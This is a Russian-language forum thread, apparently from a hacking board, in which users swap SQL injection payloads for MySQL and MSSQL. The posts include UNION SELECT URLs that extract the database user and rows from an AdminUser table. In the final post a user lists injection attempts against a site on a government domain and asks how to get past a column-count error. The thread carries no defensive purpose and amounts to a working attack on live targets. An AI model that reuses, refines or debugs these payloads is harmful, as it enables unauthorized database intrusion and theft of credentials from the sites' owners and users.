сабж. постить токо по теме нужен пример запроса к базе... test.php?id=-1+union+select+1,2,3,4,USER(),6,7,8,9/*
ZaCo стукни пожалуста 170501. Раньше занимался исключительно mysql к mssql привыкаю еще не все знаю. Хотелось бы поговорить... вот еще index.cfm?topicID=17%20UNION%20SELECT%20TOP%201%20user%20FROM%20AdminUser-- index.cfm?topicID=17%20UNION%20SELECT%20TOP%201%20random%20FROM%20AdminUser-- Собственно еще вопрос елси верно нет вывода данных?
2limpompo ты не посмотрел это прмер все таблицы и поля известны перечитай вопрос почему не выводит если все правильно?
Вот наткнулся на сайтик не как не могу понять что делаю не так sql точно есть но вот составить не как не могу вот краткий список моих действий. _http://site.gov/index.asp?cat=6" or 1=1-- _http://site.gov/index.asp?cat=6' or 1=1-- Исполняетьбся ез ошибок Принимает значение "6". _http://site.gov/index.asp?cat=6 or 1=1-- Такой запрос не сьедает. Ругаеться на кол - во строк. _http://site.gov/index.asp?cat=6 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES-- Попытка прервать запрос не удаеться. как с одинарной так и с 2 кавычкой. _http://site.gov/index.asp?cat=6'; UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES-- Ну собственно хотелось бы узнать как составить запрос на выполнение кто может помогите. Особенно интересует эта ошибка как ее обойти. Понятно что количество строк не совпадает...